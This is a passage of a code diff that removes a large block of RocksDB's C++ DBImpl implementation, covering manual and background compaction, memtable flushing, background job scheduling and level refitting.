-    if (job_context.HaveSomethingToDelete()) {
-      // no mutex is locked here.  No need to Unlock() and Lock() here.
-      PurgeObsoleteFiles(job_context);
-    }
-    job_context.Clean();
-  }
-
-  return s;
-#endif  // ROCKSDB_LITE
-}
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::CompactFilesImpl(
-    const CompactionOptions& compact_options, ColumnFamilyData* cfd,
-    Version* version, const std::vector<std::string>& input_file_names,
-    const int output_level, int output_path_id, JobContext* job_context,
-    LogBuffer* log_buffer) {
-  mutex_.AssertHeld();
-
-  if (shutting_down_.load(std::memory_order_acquire)) {
-    return Status::ShutdownInProgress();
-  }
-
-  std::unordered_set<uint64_t> input_set;
-  for (auto file_name : input_file_names) {
-    input_set.insert(TableFileNameToNumber(file_name));
-  }
-
-  ColumnFamilyMetaData cf_meta;
-  // TODO(yhchiang): can directly use version here if none of the
-  // following functions call is pluggable to external developers.
-  version->GetColumnFamilyMetaData(&cf_meta);
-
-  if (output_path_id < 0) {
-    if (immutable_db_options_.db_paths.size() == 1U) {
-      output_path_id = 0;
-    } else {
-      return Status::NotSupported(
-          "Automatic output path selection is not "
-          "yet supported in CompactFiles()");
-    }
-  }
-
-  Status s = cfd->compaction_picker()->SanitizeCompactionInputFiles(
-      &input_set, cf_meta, output_level);
-  if (!s.ok()) {
-    return s;
-  }
-
-  std::vector<CompactionInputFiles> input_files;
-  s = cfd->compaction_picker()->GetCompactionInputsFromFileNumbers(
-      &input_files, &input_set, version->storage_info(), compact_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  for (auto inputs : input_files) {
-    if (cfd->compaction_picker()->AreFilesInCompaction(inputs.files)) {
-      return Status::Aborted(
-          "Some of the necessary compaction input "
-          "files are already being compacted");
-    }
-  }
-
-  // At this point, CompactFiles will be run.
-  bg_compaction_scheduled_++;
-
-  unique_ptr<Compaction> c;
-  assert(cfd->compaction_picker());
-  c.reset(cfd->compaction_picker()->CompactFiles(
-      compact_options, input_files, output_level, version->storage_info(),
-      *cfd->GetLatestMutableCFOptions(), output_path_id));
-  if (!c) {
-    return Status::Aborted("Another Level 0 compaction is running");
-  }
-  c->SetInputVersion(version);
-  // deletion compaction currently not allowed in CompactFiles.
-  assert(!c->deletion_compaction());
-
-  SequenceNumber earliest_write_conflict_snapshot;
-  std::vector<SequenceNumber> snapshot_seqs =
-      snapshots_.GetAll(&earliest_write_conflict_snapshot);
-
-  auto pending_outputs_inserted_elem =
-      CaptureCurrentFileNumberInPendingOutputs();
-
-  assert(is_snapshot_supported_ || snapshots_.empty());
-  CompactionJob compaction_job(
-      job_context->job_id, c.get(), immutable_db_options_, env_options_,
-      versions_.get(), &shutting_down_, log_buffer, directories_.GetDbDir(),
-      directories_.GetDataDir(c->output_path_id()), stats_, &mutex_, &bg_error_,
-      snapshot_seqs, earliest_write_conflict_snapshot, table_cache_,
-      &event_logger_, c->mutable_cf_options()->paranoid_file_checks,
-      c->mutable_cf_options()->report_bg_io_stats, dbname_,
-      nullptr);  // Here we pass a nullptr for CompactionJobStats because
-                 // CompactFiles does not trigger OnCompactionCompleted(),
-                 // which is the only place where CompactionJobStats is
-                 // returned.  The idea of not triggering OnCompationCompleted()
-                 // is that CompactFiles runs in the caller thread, so the user
-                 // should always know when it completes.  As a result, it makes
-                 // less sense to notify the users something they should already
-                 // know.
-                 //
-                 // In the future, if we would like to add CompactionJobStats
-                 // support for CompactFiles, we should have CompactFiles API
-                 // pass a pointer of CompactionJobStats as the out-value
-                 // instead of using EventListener.
-
-  // Creating a compaction influences the compaction score because the score
-  // takes running compactions into account (by skipping files that are already
-  // being compacted). Since we just changed compaction score, we recalculate it
-  // here.
-  version->storage_info()->ComputeCompactionScore(*cfd->ioptions(),
-                                                  *c->mutable_cf_options());
-
-  compaction_job.Prepare();
-
-  mutex_.Unlock();
-  TEST_SYNC_POINT("CompactFilesImpl:0");
-  TEST_SYNC_POINT("CompactFilesImpl:1");
-  compaction_job.Run();
-  TEST_SYNC_POINT("CompactFilesImpl:2");
-  TEST_SYNC_POINT("CompactFilesImpl:3");
-  mutex_.Lock();
-
-  Status status = compaction_job.Install(*c->mutable_cf_options());
-  if (status.ok()) {
-    InstallSuperVersionAndScheduleWorkWrapper(
-        c->column_family_data(), job_context, *c->mutable_cf_options());
-  }
-  c->ReleaseCompactionFiles(s);
-
-  ReleaseFileNumberFromPendingOutputs(pending_outputs_inserted_elem);
-
-  if (status.ok()) {
-    // Done
-  } else if (status.IsShutdownInProgress()) {
-    // Ignore compaction errors found during shutting down
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "[%s] [JOB %d] Compaction error: %s",
-                   c->column_family_data()->GetName().c_str(),
-                   job_context->job_id, status.ToString().c_str());
-    if (immutable_db_options_.paranoid_checks && bg_error_.ok()) {
-      Status new_bg_error = status;
-      // may temporarily unlock and lock the mutex.
-      EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                            BackgroundErrorReason::kCompaction,
-                                            &new_bg_error, &mutex_);
-      if (!new_bg_error.ok()) {
-        bg_error_ = new_bg_error;
-      }
-    }
-  }
-
-  c.reset();
-
-  bg_compaction_scheduled_--;
-  if (bg_compaction_scheduled_ == 0) {
-    bg_cv_.SignalAll();
-  }
-
-  return status;
-}
-#endif  // ROCKSDB_LITE
-
-Status DBImpl::PauseBackgroundWork() {
-  InstrumentedMutexLock guard_lock(&mutex_);
-  bg_compaction_paused_++;
-  while (bg_bottom_compaction_scheduled_ > 0 || bg_compaction_scheduled_ > 0 ||
-         bg_flush_scheduled_ > 0) {
-    bg_cv_.Wait();
-  }
-  bg_work_paused_++;
-  return Status::OK();
-}
-
-Status DBImpl::ContinueBackgroundWork() {
-  InstrumentedMutexLock guard_lock(&mutex_);
-  if (bg_work_paused_ == 0) {
-    return Status::InvalidArgument();
-  }
-  assert(bg_work_paused_ > 0);
-  assert(bg_compaction_paused_ > 0);
-  bg_compaction_paused_--;
-  bg_work_paused_--;
-  // It's sufficient to check just bg_work_paused_ here since
-  // bg_work_paused_ is always no greater than bg_compaction_paused_
-  if (bg_work_paused_ == 0) {
-    MaybeScheduleFlushOrCompaction();
-  }
-  return Status::OK();
-}
-
-void DBImpl::NotifyOnCompactionCompleted(
-    ColumnFamilyData* cfd, Compaction *c, const Status &st,
-    const CompactionJobStats& compaction_job_stats,
-    const int job_id) {
-#ifndef ROCKSDB_LITE
-  if (immutable_db_options_.listeners.size() == 0U) {
-    return;
-  }
-  mutex_.AssertHeld();
-  if (shutting_down_.load(std::memory_order_acquire)) {
-    return;
-  }
-  // release lock while notifying events
-  mutex_.Unlock();
-  TEST_SYNC_POINT("DBImpl::NotifyOnCompactionCompleted::UnlockMutex");
-  {
-    CompactionJobInfo info;
-    info.cf_name = cfd->GetName();
-    info.status = st;
-    info.thread_id = env_->GetThreadID();
-    info.job_id = job_id;
-    info.base_input_level = c->start_level();
-    info.output_level = c->output_level();
-    info.stats = compaction_job_stats;
-    info.table_properties = c->GetOutputTableProperties();
-    info.compaction_reason = c->compaction_reason();
-    info.compression = c->output_compression();
-    for (size_t i = 0; i < c->num_input_levels(); ++i) {
-      for (const auto fmd : *c->inputs(i)) {
-        auto fn = TableFileName(immutable_db_options_.db_paths,
-                                fmd->fd.GetNumber(), fmd->fd.GetPathId());
-        info.input_files.push_back(fn);
-        if (info.table_properties.count(fn) == 0) {
-          std::shared_ptr<const TableProperties> tp;
-          auto s = cfd->current()->GetTableProperties(&tp, fmd, &fn);
-          if (s.ok()) {
-            info.table_properties[fn] = tp;
-          }
-        }
-      }
-    }
-    for (const auto newf : c->edit()->GetNewFiles()) {
-      info.output_files.push_back(TableFileName(immutable_db_options_.db_paths,
-                                                newf.second.fd.GetNumber(),
-                                                newf.second.fd.GetPathId()));
-    }
-    for (auto listener : immutable_db_options_.listeners) {
-      listener->OnCompactionCompleted(this, info);
-    }
-  }
-  mutex_.Lock();
-  // no need to signal bg_cv_ as it will be signaled at the end of the
-  // flush process.
-#endif  // ROCKSDB_LITE
-}
-
-// REQUIREMENT: block all background work by calling PauseBackgroundWork()
-// before calling this function
-Status DBImpl::ReFitLevel(ColumnFamilyData* cfd, int level, int target_level) {
-  assert(level < cfd->NumberLevels());
-  if (target_level >= cfd->NumberLevels()) {
-    return Status::InvalidArgument("Target level exceeds number of levels");
-  }
-
-  std::unique_ptr<SuperVersion> superversion_to_free;
-  std::unique_ptr<SuperVersion> new_superversion(new SuperVersion());
-
-  Status status;
-
-  InstrumentedMutexLock guard_lock(&mutex_);
-
-  // only allow one thread refitting
-  if (refitting_level_) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "[ReFitLevel] another thread is refitting");
-    return Status::NotSupported("another thread is refitting");
-  }
-  refitting_level_ = true;
-
-  const MutableCFOptions mutable_cf_options = *cfd->GetLatestMutableCFOptions();
-  // move to a smaller level
-  int to_level = target_level;
-  if (target_level < 0) {
-    to_level = FindMinimumEmptyLevelFitting(cfd, mutable_cf_options, level);
-  }
-
-  auto* vstorage = cfd->current()->storage_info();
-  if (to_level > level) {
-    if (level == 0) {
-      return Status::NotSupported(
-          "Cannot change from level 0 to other levels.");
-    }
-    // Check levels are empty for a trivial move
-    for (int l = level + 1; l <= to_level; l++) {
-      if (vstorage->NumLevelFiles(l) > 0) {
-        return Status::NotSupported(
-            "Levels between source and target are not empty for a move.");
-      }
-    }
-  }
-  if (to_level != level) {
-    ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                    "[%s] Before refitting:\n%s", cfd->GetName().c_str(),
-                    cfd->current()->DebugString().data());
-
-    VersionEdit edit;
-    edit.SetColumnFamily(cfd->GetID());
-    for (const auto& f : vstorage->LevelFiles(level)) {
-      edit.DeleteFile(level, f->fd.GetNumber());
-      edit.AddFile(to_level, f->fd.GetNumber(), f->fd.GetPathId(),
-                   f->fd.GetFileSize(), f->smallest, f->largest,
-                   f->smallest_seqno, f->largest_seqno,
-                   f->marked_for_compaction);
-    }
-    ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                    "[%s] Apply version edit:\n%s", cfd->GetName().c_str(),
-                    edit.DebugString().data());
-
-    status = versions_->LogAndApply(cfd, mutable_cf_options, &edit, &mutex_,
-                                    directories_.GetDbDir());
-    superversion_to_free.reset(InstallSuperVersionAndScheduleWork(
-        cfd, new_superversion.release(), mutable_cf_options));
-
-    ROCKS_LOG_DEBUG(immutable_db_options_.info_log, "[%s] LogAndApply: %s\n",
-                    cfd->GetName().c_str(), status.ToString().data());
-
-    if (status.ok()) {
-      ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                      "[%s] After refitting:\n%s", cfd->GetName().c_str(),
-                      cfd->current()->DebugString().data());
-    }
-  }
-
-  refitting_level_ = false;
-
-  return status;
-}
-
-int DBImpl::NumberLevels(ColumnFamilyHandle* column_family) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  return cfh->cfd()->NumberLevels();
-}
-
-int DBImpl::MaxMemCompactionLevel(ColumnFamilyHandle* column_family) {
-  return 0;
-}
-
-int DBImpl::Level0StopWriteTrigger(ColumnFamilyHandle* column_family) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  InstrumentedMutexLock l(&mutex_);
-  return cfh->cfd()->GetSuperVersion()->
-      mutable_cf_options.level0_stop_writes_trigger;
-}
-
-Status DBImpl::Flush(const FlushOptions& flush_options,
-                     ColumnFamilyHandle* column_family) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  return FlushMemTable(cfh->cfd(), flush_options);
-}
-
-Status DBImpl::RunManualCompaction(ColumnFamilyData* cfd, int input_level,
-                                   int output_level, uint32_t output_path_id,
-                                   const Slice* begin, const Slice* end,
-                                   bool exclusive, bool disallow_trivial_move) {
-  assert(input_level == ColumnFamilyData::kCompactAllLevels ||
-         input_level >= 0);
-
-  InternalKey begin_storage, end_storage;
-  CompactionArg* ca;
-
-  bool scheduled = false;
-  bool manual_conflict = false;
-  ManualCompactionState manual;
-  manual.cfd = cfd;
-  manual.input_level = input_level;
-  manual.output_level = output_level;
-  manual.output_path_id = output_path_id;
-  manual.done = false;
-  manual.in_progress = false;
-  manual.incomplete = false;
-  manual.exclusive = exclusive;
-  manual.disallow_trivial_move = disallow_trivial_move;
-  // For universal compaction, we enforce every manual compaction to compact
-  // all files.
-  if (begin == nullptr ||
-      cfd->ioptions()->compaction_style == kCompactionStyleUniversal ||
-      cfd->ioptions()->compaction_style == kCompactionStyleFIFO) {
-    manual.begin = nullptr;
-  } else {
-    begin_storage.SetMaxPossibleForUserKey(*begin);
-    manual.begin = &begin_storage;
-  }
-  if (end == nullptr ||
-      cfd->ioptions()->compaction_style == kCompactionStyleUniversal ||
-      cfd->ioptions()->compaction_style == kCompactionStyleFIFO) {
-    manual.end = nullptr;
-  } else {
-    end_storage.SetMinPossibleForUserKey(*end);
-    manual.end = &end_storage;
-  }
-
-  TEST_SYNC_POINT("DBImpl::RunManualCompaction:0");
-  TEST_SYNC_POINT("DBImpl::RunManualCompaction:1");
-  InstrumentedMutexLock l(&mutex_);
-
-  // When a manual compaction arrives, temporarily disable scheduling of
-  // non-manual compactions and wait until the number of scheduled compaction
-  // jobs drops to zero. This is needed to ensure that this manual compaction
-  // can compact any range of keys/files.
-  //
-  // HasPendingManualCompaction() is true when at least one thread is inside
-  // RunManualCompaction(), i.e. during that time no other compaction will
-  // get scheduled (see MaybeScheduleFlushOrCompaction).
-  //
-  // Note that the following loop doesn't stop more that one thread calling
-  // RunManualCompaction() from getting to the second while loop below.
-  // However, only one of them will actually schedule compaction, while
-  // others will wait on a condition variable until it completes.
-
-  AddManualCompaction(&manual);
-  TEST_SYNC_POINT_CALLBACK("DBImpl::RunManualCompaction:NotScheduled", &mutex_);
-  if (exclusive) {
-    while (bg_bottom_compaction_scheduled_ > 0 ||
-           bg_compaction_scheduled_ > 0) {
-      TEST_SYNC_POINT("DBImpl::RunManualCompaction:WaitScheduled");
-      ROCKS_LOG_INFO(
-          immutable_db_options_.info_log,
-          "[%s] Manual compaction waiting for all other scheduled background "
-          "compactions to finish",
-          cfd->GetName().c_str());
-      bg_cv_.Wait();
-    }
-  }
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "[%s] Manual compaction starting", cfd->GetName().c_str());
-
-  // We don't check bg_error_ here, because if we get the error in compaction,
-  // the compaction will set manual.status to bg_error_ and set manual.done to
-  // true.
-  while (!manual.done) {
-    assert(HasPendingManualCompaction());
-    manual_conflict = false;
-    Compaction* compaction;
-    if (ShouldntRunManualCompaction(&manual) || (manual.in_progress == true) ||
-        scheduled ||
-        ((manual.manual_end = &manual.tmp_storage1) &&
-         ((compaction = manual.cfd->CompactRange(
-               *manual.cfd->GetLatestMutableCFOptions(), manual.input_level,
-               manual.output_level, manual.output_path_id, manual.begin,
-               manual.end, &manual.manual_end, &manual_conflict)) == nullptr) &&
-         manual_conflict)) {
-      // exclusive manual compactions should not see a conflict during
-      // CompactRange
-      assert(!exclusive || !manual_conflict);
-      // Running either this or some other manual compaction
-      bg_cv_.Wait();
-      if (scheduled && manual.incomplete == true) {
-        assert(!manual.in_progress);
-        scheduled = false;
-        manual.incomplete = false;
-      }
-    } else if (!scheduled) {
-      if (compaction == nullptr) {
-        manual.done = true;
-        bg_cv_.SignalAll();
-        continue;
-      }
-      ca = new CompactionArg;
-      ca->db = this;
-      ca->prepicked_compaction = new PrepickedCompaction;
-      ca->prepicked_compaction->manual_compaction_state = &manual;
-      ca->prepicked_compaction->compaction = compaction;
-      manual.incomplete = false;
-      bg_compaction_scheduled_++;
-      env_->Schedule(&DBImpl::BGWorkCompaction, ca, Env::Priority::LOW, this,
-                     &DBImpl::UnscheduleCallback);
-      scheduled = true;
-    }
-  }
-
-  assert(!manual.in_progress);
-  assert(HasPendingManualCompaction());
-  RemoveManualCompaction(&manual);
-  bg_cv_.SignalAll();
-  return manual.status;
-}
-
-Status DBImpl::FlushMemTable(ColumnFamilyData* cfd,
-                             const FlushOptions& flush_options,
-                             bool writes_stopped) {
-  Status s;
-  {
-    WriteContext context;
-    InstrumentedMutexLock guard_lock(&mutex_);
-
-    if (cfd->imm()->NumNotFlushed() == 0 && cfd->mem()->IsEmpty()) {
-      // Nothing to flush
-      return Status::OK();
-    }
-
-    WriteThread::Writer w;
-    if (!writes_stopped) {
-      write_thread_.EnterUnbatched(&w, &mutex_);
-    }
-
-    // SwitchMemtable() will release and reacquire mutex
-    // during execution
-    s = SwitchMemtable(cfd, &context);
-
-    if (!writes_stopped) {
-      write_thread_.ExitUnbatched(&w);
-    }
-
-    cfd->imm()->FlushRequested();
-
-    // schedule flush
-    SchedulePendingFlush(cfd);
-    MaybeScheduleFlushOrCompaction();
-  }
-
-  if (s.ok() && flush_options.wait) {
-    // Wait until the compaction completes
-    s = WaitForFlushMemTable(cfd);
-  }
-  return s;
-}
-
-Status DBImpl::WaitForFlushMemTable(ColumnFamilyData* cfd) {
-  Status s;
-  // Wait until the compaction completes
-  InstrumentedMutexLock l(&mutex_);
-  while (cfd->imm()->NumNotFlushed() > 0 && bg_error_.ok()) {
-    if (shutting_down_.load(std::memory_order_acquire)) {
-      return Status::ShutdownInProgress();
-    }
-    if (cfd->IsDropped()) {
-      // FlushJob cannot flush a dropped CF, if we did not break here
-      // we will loop forever since cfd->imm()->NumNotFlushed() will never
-      // drop to zero
-      return Status::InvalidArgument("Cannot flush a dropped CF");
-    }
-    bg_cv_.Wait();
-  }
-  if (!bg_error_.ok()) {
-    s = bg_error_;
-  }
-  return s;
-}
-
-Status DBImpl::EnableAutoCompaction(
-    const std::vector<ColumnFamilyHandle*>& column_family_handles) {
-  Status s;
-  for (auto cf_ptr : column_family_handles) {
-    Status status =
-        this->SetOptions(cf_ptr, {{"disable_auto_compactions", "false"}});
-    if (!status.ok()) {
-      s = status;
-    }
-  }
-
-  return s;
-}
-
-void DBImpl::MaybeScheduleFlushOrCompaction() {
-  mutex_.AssertHeld();
-  if (!opened_successfully_) {
-    // Compaction may introduce data race to DB open
-    return;
-  }
-  if (bg_work_paused_ > 0) {
-    // we paused the background work
-    return;
-  } else if (shutting_down_.load(std::memory_order_acquire)) {
-    // DB is being deleted; no more background compactions
-    return;
-  }
-  auto bg_job_limits = GetBGJobLimits();
-  bool is_flush_pool_empty =
-    env_->GetBackgroundThreads(Env::Priority::HIGH) == 0;
-  while (!is_flush_pool_empty && unscheduled_flushes_ > 0 &&
-         bg_flush_scheduled_ < bg_job_limits.max_flushes) {
-    unscheduled_flushes_--;
-    bg_flush_scheduled_++;
-    env_->Schedule(&DBImpl::BGWorkFlush, this, Env::Priority::HIGH, this);
-  }
-
-  // special case -- if high-pri (flush) thread pool is empty, then schedule
-  // flushes in low-pri (compaction) thread pool.
-  if (is_flush_pool_empty) {
-    while (unscheduled_flushes_ > 0 &&
-           bg_flush_scheduled_ + bg_compaction_scheduled_ <
-               bg_job_limits.max_flushes) {
-      unscheduled_flushes_--;
-      bg_flush_scheduled_++;
-      env_->Schedule(&DBImpl::BGWorkFlush, this, Env::Priority::LOW, this);
-    }
-  }
-
-  if (bg_compaction_paused_ > 0) {
-    // we paused the background compaction
-    return;
-  }
-
-  if (HasExclusiveManualCompaction()) {
-    // only manual compactions are allowed to run. don't schedule automatic
-    // compactions
-    return;
-  }
-
-  while (bg_compaction_scheduled_ < bg_job_limits.max_compactions &&
-         unscheduled_compactions_ > 0) {
-    CompactionArg* ca = new CompactionArg;
-    ca->db = this;
-    ca->prepicked_compaction = nullptr;
-    bg_compaction_scheduled_++;
-    unscheduled_compactions_--;
-    env_->Schedule(&DBImpl::BGWorkCompaction, ca, Env::Priority::LOW, this,
-                   &DBImpl::UnscheduleCallback);
-  }
-}
-
-DBImpl::BGJobLimits DBImpl::GetBGJobLimits() const {
-  mutex_.AssertHeld();
-  return GetBGJobLimits(immutable_db_options_.max_background_flushes,
-                        mutable_db_options_.max_background_compactions,
-                        mutable_db_options_.max_background_jobs,
-                        write_controller_.NeedSpeedupCompaction());
-}
-
-DBImpl::BGJobLimits DBImpl::GetBGJobLimits(int max_background_flushes,
-                                           int max_background_compactions,
-                                           int max_background_jobs,
-                                           bool parallelize_compactions) {
-  BGJobLimits res;
-  if (max_background_flushes == -1 && max_background_compactions == -1) {
-    // for our first stab implementing max_background_jobs, simply allocate a
-    // quarter of the threads to flushes.
-    res.max_flushes = std::max(1, max_background_jobs / 4);
-    res.max_compactions = std::max(1, max_background_jobs - res.max_flushes);
-  } else {
-    // compatibility code in case users haven't migrated to max_background_jobs,
-    // which automatically computes flush/compaction limits
-    res.max_flushes = std::max(1, max_background_flushes);
-    res.max_compactions = std::max(1, max_background_compactions);
-  }
-  if (!parallelize_compactions) {
-    // throttle background compactions until we deem necessary
-    res.max_compactions = 1;
-  }
-  return res;
-}
-
-void DBImpl::AddToCompactionQueue(ColumnFamilyData* cfd) {
-  assert(!cfd->pending_compaction());
-  cfd->Ref();
-  compaction_queue_.push_back(cfd);
-  cfd->set_pending_compaction(true);
-}
-
-ColumnFamilyData* DBImpl::PopFirstFromCompactionQueue() {
-  assert(!compaction_queue_.empty());
-  auto cfd = *compaction_queue_.begin();
-  compaction_queue_.pop_front();
-  assert(cfd->pending_compaction());
-  cfd->set_pending_compaction(false);
-  return cfd;
-}
-
-void DBImpl::AddToFlushQueue(ColumnFamilyData* cfd) {
-  assert(!cfd->pending_flush());
-  cfd->Ref();
-  flush_queue_.push_back(cfd);
-  cfd->set_pending_flush(true);
-}
-
-ColumnFamilyData* DBImpl::PopFirstFromFlushQueue() {
-  assert(!flush_queue_.empty());
-  auto cfd = *flush_queue_.begin();
-  flush_queue_.pop_front();
-  assert(cfd->pending_flush());
-  cfd->set_pending_flush(false);
-  return cfd;
-}
-
-void DBImpl::SchedulePendingFlush(ColumnFamilyData* cfd) {
-  if (!cfd->pending_flush() && cfd->imm()->IsFlushPending()) {
-    AddToFlushQueue(cfd);
-    ++unscheduled_flushes_;
-  }
-}
-
-void DBImpl::SchedulePendingCompaction(ColumnFamilyData* cfd) {
-  if (!cfd->pending_compaction() && cfd->NeedsCompaction()) {
-    AddToCompactionQueue(cfd);
-    ++unscheduled_compactions_;
-  }
-}
-
-void DBImpl::SchedulePendingPurge(std::string fname, FileType type,
-                                  uint64_t number, uint32_t path_id,
-                                  int job_id) {
-  mutex_.AssertHeld();
-  PurgeFileInfo file_info(fname, type, number, path_id, job_id);
-  purge_queue_.push_back(std::move(file_info));
-}
-
-void DBImpl::BGWorkFlush(void* db) {
-  IOSTATS_SET_THREAD_POOL_ID(Env::Priority::HIGH);
-  TEST_SYNC_POINT("DBImpl::BGWorkFlush");
-  reinterpret_cast<DBImpl*>(db)->BackgroundCallFlush();
-  TEST_SYNC_POINT("DBImpl::BGWorkFlush:done");
-}
-
-void DBImpl::BGWorkCompaction(void* arg) {
-  CompactionArg ca = *(reinterpret_cast<CompactionArg*>(arg));
-  delete reinterpret_cast<CompactionArg*>(arg);
-  IOSTATS_SET_THREAD_POOL_ID(Env::Priority::LOW);
-  TEST_SYNC_POINT("DBImpl::BGWorkCompaction");
-  auto prepicked_compaction =
-      static_cast<PrepickedCompaction*>(ca.prepicked_compaction);
-  reinterpret_cast<DBImpl*>(ca.db)->BackgroundCallCompaction(
-      prepicked_compaction, Env::Priority::LOW);
-  delete prepicked_compaction;
-}
-
-void DBImpl::BGWorkBottomCompaction(void* arg) {
-  CompactionArg ca = *(static_cast<CompactionArg*>(arg));
-  delete static_cast<CompactionArg*>(arg);
-  IOSTATS_SET_THREAD_POOL_ID(Env::Priority::BOTTOM);
-  TEST_SYNC_POINT("DBImpl::BGWorkBottomCompaction");
-  auto* prepicked_compaction = ca.prepicked_compaction;
-  assert(prepicked_compaction && prepicked_compaction->compaction &&
-         !prepicked_compaction->manual_compaction_state);
-  ca.db->BackgroundCallCompaction(prepicked_compaction, Env::Priority::BOTTOM);
-  delete prepicked_compaction;
-}
-
-void DBImpl::BGWorkPurge(void* db) {
-  IOSTATS_SET_THREAD_POOL_ID(Env::Priority::HIGH);
-  TEST_SYNC_POINT("DBImpl::BGWorkPurge:start");
-  reinterpret_cast<DBImpl*>(db)->BackgroundCallPurge();
-  TEST_SYNC_POINT("DBImpl::BGWorkPurge:end");
-}
-
-void DBImpl::UnscheduleCallback(void* arg) {
-  CompactionArg ca = *(reinterpret_cast<CompactionArg*>(arg));
-  delete reinterpret_cast<CompactionArg*>(arg);
-  if (ca.prepicked_compaction != nullptr) {
-    if (ca.prepicked_compaction->compaction != nullptr) {
-      delete ca.prepicked_compaction->compaction;
-    }
-    delete ca.prepicked_compaction;
-  }
-  TEST_SYNC_POINT("DBImpl::UnscheduleCallback");
-}
-
-Status DBImpl::BackgroundFlush(bool* made_progress, JobContext* job_context,
-                               LogBuffer* log_buffer) {
-  mutex_.AssertHeld();
-
-  Status status = bg_error_;
-  if (status.ok() && shutting_down_.load(std::memory_order_acquire)) {
-    status = Status::ShutdownInProgress();
-  }
-
-  if (!status.ok()) {
-    return status;
-  }
-
-  ColumnFamilyData* cfd = nullptr;
-  while (!flush_queue_.empty()) {
-    // This cfd is already referenced
-    auto first_cfd = PopFirstFromFlushQueue();
-
-    if (first_cfd->IsDropped() || !first_cfd->imm()->IsFlushPending()) {
-      // can't flush this CF, try next one
-      if (first_cfd->Unref()) {
-        delete first_cfd;
-      }
-      continue;
-    }
-
-    // found a flush!
-    cfd = first_cfd;
-    break;
-  }
-
-  if (cfd != nullptr) {
-    const MutableCFOptions mutable_cf_options =
-        *cfd->GetLatestMutableCFOptions();
-    auto bg_job_limits = GetBGJobLimits();
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "Calling FlushMemTableToOutputFile with column "
-        "family [%s], flush slots available %d, compaction slots available %d, "
-        "flush slots scheduled %d, compaction slots scheduled %d",
-        cfd->GetName().c_str(), bg_job_limits.max_flushes,
-        bg_job_limits.max_compactions, bg_flush_scheduled_,
-        bg_compaction_scheduled_);
-    status = FlushMemTableToOutputFile(cfd, mutable_cf_options, made_progress,
-                                       job_context, log_buffer);
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-  }
-  return status;
-}
-
-void DBImpl::BackgroundCallFlush() {
-  bool made_progress = false;
-  JobContext job_context(next_job_id_.fetch_add(1), true);
-
-  TEST_SYNC_POINT("DBImpl::BackgroundCallFlush:start");
-
-  LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL,
-                       immutable_db_options_.info_log.get());
-  {
-    InstrumentedMutexLock l(&mutex_);
-    assert(bg_flush_scheduled_);
-    num_running_flushes_++;
-
-    auto pending_outputs_inserted_elem =
-        CaptureCurrentFileNumberInPendingOutputs();
-
-    Status s = BackgroundFlush(&made_progress, &job_context, &log_buffer);
-    if (!s.ok() && !s.IsShutdownInProgress()) {
-      // Wait a little bit before retrying background flush in
-      // case this is an environmental problem and we do not want to
-      // chew up resources for failed flushes for the duration of
-      // the problem.
-      uint64_t error_cnt =
-        default_cf_internal_stats_->BumpAndGetBackgroundErrorCount();
-      bg_cv_.SignalAll();  // In case a waiter can proceed despite the error
-      mutex_.Unlock();
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "Waiting after background flush error: %s"
-                      "Accumulated background error counts: %" PRIu64,
-                      s.ToString().c_str(), error_cnt);
-      log_buffer.FlushBufferToLog();
-      LogFlush(immutable_db_options_.info_log);
-      env_->SleepForMicroseconds(1000000);
-      mutex_.Lock();
-    }
-
-    ReleaseFileNumberFromPendingOutputs(pending_outputs_inserted_elem);
-
-    // If flush failed, we want to delete all temporary files that we might have
-    // created. Thus, we force full scan in FindObsoleteFiles()
-    FindObsoleteFiles(&job_context, !s.ok() && !s.IsShutdownInProgress());
-    // delete unnecessary files if any, this is done outside the mutex
-    if (job_context.HaveSomethingToDelete() || !log_buffer.IsEmpty()) {
-      mutex_.Unlock();
-      // Have to flush the info logs before bg_flush_scheduled_--
-      // because if bg_flush_scheduled_ becomes 0 and the lock is
-      // released, the deconstructor of DB can kick in and destroy all the
-      // states of DB so info_log might not be available after that point.
-      // It also applies to access other states that DB owns.
-      log_buffer.FlushBufferToLog();
-      if (job_context.HaveSomethingToDelete()) {
-        PurgeObsoleteFiles(job_context);
-      }
-      job_context.Clean();
-      mutex_.Lock();
-    }
-
-    assert(num_running_flushes_ > 0);
-    num_running_flushes_--;
-    bg_flush_scheduled_--;
-    // See if there's more work to be done
-    MaybeScheduleFlushOrCompaction();
-    bg_cv_.SignalAll();
-    // IMPORTANT: there should be no code after calling SignalAll. This call may
-    // signal the DB destructor that it's OK to proceed with destruction. In
-    // that case, all DB variables will be dealloacated and referencing them
-    // will cause trouble.
-  }
-}
-
-void DBImpl::BackgroundCallCompaction(PrepickedCompaction* prepicked_compaction,
-                                      Env::Priority bg_thread_pri) {
-  bool made_progress = false;
-  JobContext job_context(next_job_id_.fetch_add(1), true);
-  TEST_SYNC_POINT("BackgroundCallCompaction:0");
-  MaybeDumpStats();
-  LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL,
-                       immutable_db_options_.info_log.get());
-  {
-    InstrumentedMutexLock l(&mutex_);
-
-    // This call will unlock/lock the mutex to wait for current running
-    // IngestExternalFile() calls to finish.
-    WaitForIngestFile();
-
-    num_running_compactions_++;
-
-    auto pending_outputs_inserted_elem =
-        CaptureCurrentFileNumberInPendingOutputs();
-
-    assert((bg_thread_pri == Env::Priority::BOTTOM &&
-            bg_bottom_compaction_scheduled_) ||
-           (bg_thread_pri == Env::Priority::LOW && bg_compaction_scheduled_));
-    Status s = BackgroundCompaction(&made_progress, &job_context, &log_buffer,
-                                    prepicked_compaction);
-    TEST_SYNC_POINT("BackgroundCallCompaction:1");
